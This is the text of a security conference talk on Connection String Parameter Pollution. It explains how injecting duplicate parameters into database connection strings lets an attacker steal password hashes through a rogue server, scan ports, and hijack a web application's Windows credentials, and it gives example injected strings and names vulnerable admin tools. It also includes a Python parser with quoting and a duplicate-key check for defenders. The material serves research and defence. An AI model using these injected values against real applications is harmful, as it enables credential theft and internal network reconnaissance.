Chema Alonso
Informática 64
Connection Strings
• Define the way an application connects to a data repository
• There are connection strings for:
– Relational Databases (MSSQL, Oracle, MySQL,…)
– LDAP Directories
– Files
– Etc…
Databases Connection Strings
Data Source = myServerAddress;
Initial Catalog = myDataBase;
User Id = myUsername;
Password = myPassword;
Google Hacking
UDL (Universal Data Links) Files
Credentials
Operating System Accounts:
Data Source = myServerAddress;
Initial Catalog = myDataBase;
User Id = myUsername;
Password = myPassword;
Integrated Security = SSPI/True/Yes;
Database Credentials:
Data Source = myServerAddress;
Initial Catalog = myDataBase;
User Id = myUsername;
Password = myPassword;
Integrated Security = No;
Users autheticated by Web App
Web application manages the login process
(Diagram: Syslogins)
1.‐ The web application connects to the database using its connection string credentials.
2.‐ A connection string is composed with the credentials to connect to the database.
3.‐ Roles and permissions are limited by the user used in the connection string.
Data Source = myServerAddress;
Initial Catalog = myDataBase;
Integrated Security = NO;
User Id = myUsername;
Password = myPassword;
Encryption = Off;
ConnectionStringBuilder
• Available in .NET Framework 2.0
• Builds secure connection strings from parameters
• It's not possible to inject into the connection string
Are people aware of this?
Connection String Parameter Pollution
• The goal is to inject parameters into the connection string, whether they already exist or not
• If a parameter is duplicated, the last value wins
• This behavior allows attackers to completely rewrite the connection string, and therefore to manipulate the way the application will work and how it will be authenticated
Pollutionable Behavior
Param1=Value A; Param2=Value B; Param1=Value C; Param2=Value D
DBConnection Object: Param1 → Value C, Param2 → Value D (the last value wins)
What can be done with CSPP?
Rewrite a parameter
Data Source=DB1; UID=sa; password=Pwnd!; Data Source=DB2
DBConnection Object: DataSource → DB2, UID → sa, password → Pwnd!
Scanning the DMZ
(Diagram: Internet, FW, Web app vulnerable to CSPP, Production Database, Data Source)
Port Scanning a Server
(Diagram: Internet, FW, Web app vulnerable to CSPP, Production Database, Server; DataSource values: DB1,80 / DB1,21 / DB1,25 / DB1,1445)
What can be done with CSPP?
Add a parameter
Data Source=DB1; UID=sa; password=Pwnd!; Integrated Security=True
DBConnection Object: DataSource → DB1, UID → sa, password → Pwnd!, Integrated Security → True
CSPP Attack 1: Hash stealing
1.‐ Run a Rogue Server on an accessible IP address: Rogue_Server
2.‐ Activate a sniffer to catch the login process: Cain/Wireshark
3.‐ Duplicate the Data Source parameter: Data_Source=Rogue_Server
4.‐ Force Windows Integrated Authentication: Integrated Security=true
CSPP Attack 1: Hash stealing
Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id=+'User_Value'+; Password=+'Password_Value'+;
Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id= ;Data Source=Rogue_Server; Password=;Integrated Security=True;
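Added example (a Python model written for this page, not the authors' code): it applies the duplicate-keyword rule from the Pollutionable Behavior slide to the composed strings above, then shows the builder-style quoting the ConnectionStringBuilder slide refers to and a duplicate-keyword check a defender can log or block on. The keyword synonyms are the real SqlClient ones; the parser is a simplified model of SqlClient's, and compose(), quote() and polluted_keys() are names chosen here.

```python
# Real SqlClient keyword synonyms, folded to one canonical name ("Server=" is "Data Source=").
ALIASES = {"server": "data source", "address": "data source", "addr": "data source",
           "network address": "data source", "uid": "user id", "user": "user id",
           "pwd": "password", "trusted_connection": "integrated security"}
BASE = "Data Source=SQL2005;Initial Catalog=db1;Integrated Security=no;"  # from the slides

def parse(conn_str):
    """Return (effective dict, every (key, value) seen in order); ' or " quote a value."""
    seen, i, n = [], 0, len(conn_str)
    while i < n:
        while i < n and conn_str[i] in " ;\t":             # skip separators / empty pairs
            i += 1
        eq = conn_str.find("=", i)
        if eq == -1:
            break
        key = conn_str[i:eq].strip().lower()
        key, i = ALIASES.get(key, key), eq + 1
        while i < n and conn_str[i] == " ":
            i += 1
        if i < n and conn_str[i] in "'\"":                  # quoted value, "" inside = one "
            q, i, buf = conn_str[i], i + 1, []
            while i < n and not (conn_str[i] == q and conn_str[i + 1:i + 2] != q):
                if conn_str[i] == q:
                    i += 1
                buf.append(conn_str[i])
                i += 1
            value, i = "".join(buf), i + 1
        else:                                               # bare value ends at ';'
            end = conn_str.find(";", i)
            end = n if end == -1 else end
            value, i = conn_str[i:end].strip(), end
        if key:
            seen.append((key, value))
    return {k: v for k, v in seen}, seen                    # dict keeps the LAST value

def quote(value):
    """Builder-style quoting: ';', '=', quotes or edge whitespace force "..." with " doubled."""
    if any(c in value for c in ";=\"'") or value != value.strip():
        return '"' + value.replace('"', '""') + '"'
    return value

def compose(user, password, quoted=False):
    """The slides' raw concatenation (quoted=False) or the hardened form (quoted=True)."""
    q = quote if quoted else (lambda v: v)
    return BASE + f"user id={q(user)};Password={q(password)};"

def polluted_keys(conn_str):
    """Defender check: canonical keywords that were supplied more than once."""
    keys = [k for k, _ in parse(conn_str)[1]]
    return sorted({k for k in keys if keys.count(k) > 1})
```

With the slide's values, compose(";Data Source=Rogue_Server", ";Integrated Security=True") parses to Data Source=Rogue_Server and Integrated Security=True, while the quoted form keeps both inside the user id and password values and polluted_keys() reports nothing.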
CSPP 1: ASP.NET Enterprise Manager
CSPP Attack 2: Port Scanning
1.‐ Duplicate the Data Source parameter, setting on it the target server and target port to be scanned: Data_Source=Target_Server,target_Port
2.‐ Check the error messages:
‐ No TCP Connection ‐> Port is opened
‐ No SQL Server ‐> Port is closed
‐ SQL Server ‐> Invalid Password
CSPP Attack 2: Port Scanning
Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id=+'User_Value'+; Password=+'Password_Value'+;
Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id= ;Data Source=Target_Server, Target_Port; Password=;Integrated Security=True;
CSPP 2: myLittleAdmin
Port is Opened
CSPP 2: myLittleAdmin
Port is Closed
CSPP Attack 3: Hijacking Web Credentials
1.‐ Duplicate the Data Source parameter to the target SQL Server: Data_Source=Target_Server
2.‐ Force Windows Authentication: Integrated Security=true
3.‐ The application pool in which the web app is running will send its credentials in order to log in to the database engine.
CSPP Attack 3: Hijacking Web Credentials
Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id=+'User_Value'+; Password=+'Password_Value'+;
Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id= ;Data Source=Target_Server; Password=;Integrated Security=true;
CSPP Attack 3: Web Data Administrator
CSPP Attack 3: myLittleAdmin/myLittleBackup
CSPP Attack 3: ASP.NET Enterprise Manager
Other Databases
• MySQL
– Does not support Integrated Security
– It's still possible to manipulate the behavior of the web application:
• Port Scanning
• Connect to internal/testing/development Databases
• Oracle supports integrated authentication running on Windows and UNIX/Linux servers
– It's possible to perform all described attacks:
• Hash stealing
• Port Scanning
• Hijacking Web credentials
– It's also possible to elevate a connection to sysdba in order to shutdown/startup an instance
myLittleAdmin/myLittleBackup
• Fix the code yourself
ASP.NET Enterprise Manager
• ASP.NET Enterprise Manager is "abandoned", but it's been used in a lot of web Control Panels.
• Fix the code yourself
ASP.NET Web Data Administrator
• Filter the ;)
Questions?
Contact
Chema Alonso
chema@informatica64.com
http://www.informatica64.com
http://elladodelmal.blogspot.com
Palako
palakko@lateatral.com
Authors
Chema Alonso
Manuel Fernández “The Sur”
Alejandro Martín Bailón
Antonio Guzmán